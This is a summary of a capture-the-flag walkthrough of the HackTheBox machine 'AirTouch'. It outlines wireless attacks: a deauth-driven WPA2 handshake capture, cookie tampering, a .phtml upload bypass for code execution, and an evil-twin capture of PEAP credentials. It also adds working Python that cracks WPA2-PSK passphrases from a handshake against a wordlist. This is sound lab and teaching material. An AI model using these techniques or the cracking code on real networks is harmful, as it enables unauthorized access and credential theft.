A detailed walkthrough of the HackTheBox machine 'AirTouch', which simulates a wireless network environment. The attack chain starts with extracting a default password from SNMP to SSH into a container with virtual wireless interfaces. From there, a WPA2-PSK handshake for the 'AirTouch-Internet' network is captured via deauth attack and cracked using aircrack-ng with rockyou.txt. Decrypting captured traffic in Wireshark reveals session cookies for a router management site. A client-side UserRole cookie is manipulated to gain admin access, and a PHP extension filter is bypassed using .phtml to achieve RCE. Hardcoded credentials in PHP source code provide the next user, and unrestricted sudo grants root. The root home directory contains CA and server certificates for the corporate WPA2-Enterprise network, which are used with eaphammer to set up an evil twin of 'AirTouch-Office' to capture PEAP-MSCHAPv2 credentials.
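The cracking step in that chain (capture the 4-way handshake, feed it to aircrack-ng with rockyou.txt) is a deterministic derivation, so it is worth seeing the arithmetic aircrack-ng actually runs. The block below is an added example, not code from 0xdf's writeup or from the box: it derives the PMK from a candidate passphrase and the SSID, expands it to the PTK, takes the KCK and checks whether it reproduces the MIC on EAPOL message 2. The MAC addresses, nonces, EAPOL frame, wordlist and the "captured" passphrase are all constructed here so it runs offline; only the SSID is taken from the writeup.

```python
"""
WPA2-PSK handshake cracking as aircrack-ng does it, in plain Python.

Added example; not from the writeup or the box. Everything below except the
SSID is constructed for the demo: to crack a real capture, replace the fields
in the handshake dict with values pulled from the pcap.
"""
import hashlib
import hmac
from typing import Optional

SSID = "AirTouch-Internet"  # network named in the writeup


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    # This is the expensive step and why wordlist quality matters.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonce)||max(nonce))
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    label = b"Pairwise key expansion"
    out = b""
    for i in range(4):  # 4 x 20 bytes of HMAC-SHA1 output covers the 64 bytes needed
        out += hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # Key descriptor version 2 (AES-CCMP): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16].
    # The 16-byte MIC field starts at offset 81 of the EAPOL-Key frame
    # (4-byte EAPOL header + 77 bytes of key descriptor fields before it).
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(handshake: dict, wordlist) -> Optional[str]:
    """Return the first candidate whose derived KCK reproduces the captured MIC, else None."""
    for candidate in wordlist:
        candidate = candidate.strip()
        if not 8 <= len(candidate) <= 63:  # WPA2 passphrase length limits; skip early
            continue
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        kck = prf_512(pmk, handshake["ap_mac"], handshake["sta_mac"],
                      handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return candidate
    return None


def build_eapol_msg2(snonce: bytes) -> bytes:
    # Constructed minimal EAPOL-Key message 2 (client -> AP) with an empty MIC slot.
    key_descriptor = (
        b"\x02"                    # descriptor type: RSN
        + b"\x01\x0a"              # key info: MIC set, pairwise, descriptor version 2
        + b"\x00\x10"              # key length 16
        + b"\x00" * 7 + b"\x01"    # replay counter
        + snonce                   # key nonce (SNonce)
        + b"\x00" * 16             # key IV
        + b"\x00" * 8              # key RSC
        + b"\x00" * 8              # key ID
        + b"\x00" * 16             # MIC (filled in by forge_handshake)
        + b"\x00\x00"              # key data length 0
    )
    return b"\x02\x03" + len(key_descriptor).to_bytes(2, "big") + key_descriptor


def forge_handshake(passphrase: str) -> dict:
    """Stand-in for the deauth + capture step: a handshake whose MIC matches `passphrase`."""
    ap_mac = bytes.fromhex("02aa11aa11aa")            # constructed locally-administered MACs
    sta_mac = bytes.fromhex("02bb22bb22bb")
    anonce = hashlib.sha256(b"constructed-anonce").digest()  # constructed 32-byte nonces
    snonce = hashlib.sha256(b"constructed-snonce").digest()
    eapol = build_eapol_msg2(snonce)
    kck = prf_512(pmk_from_passphrase(passphrase, SSID), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol)
    eapol = eapol[:81] + mic + eapol[97:]             # frame as it would appear on the air
    return {"ssid": SSID, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol, "mic": mic}


# Constructed capture and wordlist; the passphrase is an assumption, not the box's.
CAPTURE = forge_handshake("not-the-real-psk")
WORDLIST = ["password", "12345678", "short", "AirTouch2024", "not-the-real-psk", "letmein99"]


if __name__ == "__main__":
    found = crack(CAPTURE, WORDLIST)
    print(f"KEY FOUND! [ {found} ]" if found else "passphrase not in wordlist")
```

Each candidate costs 4096 HMAC-SHA1 iterations before the cheap MIC comparison, so the time is dominated by PBKDF2 and scales linearly with the wordlist; that is the same budget aircrack-ng (or hashcat mode 22000) spends, which is why a handshake protected by a passphrase outside rockyou.txt survives this step.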

From 0xdf.gitlab.io (44 min read)
Table of contents

- Box Info
- Recon
- Shell as root@AirTouch-Consultant
- Connection to AirTouch-Internet
- Shell as www-data@AirTouch-AP-PSK
- Shell as root@AirTouch-AP-PSK
- Shell as remote@AirTouch-AP-MGT
- Shell as root@AirTouch-AP-MGT
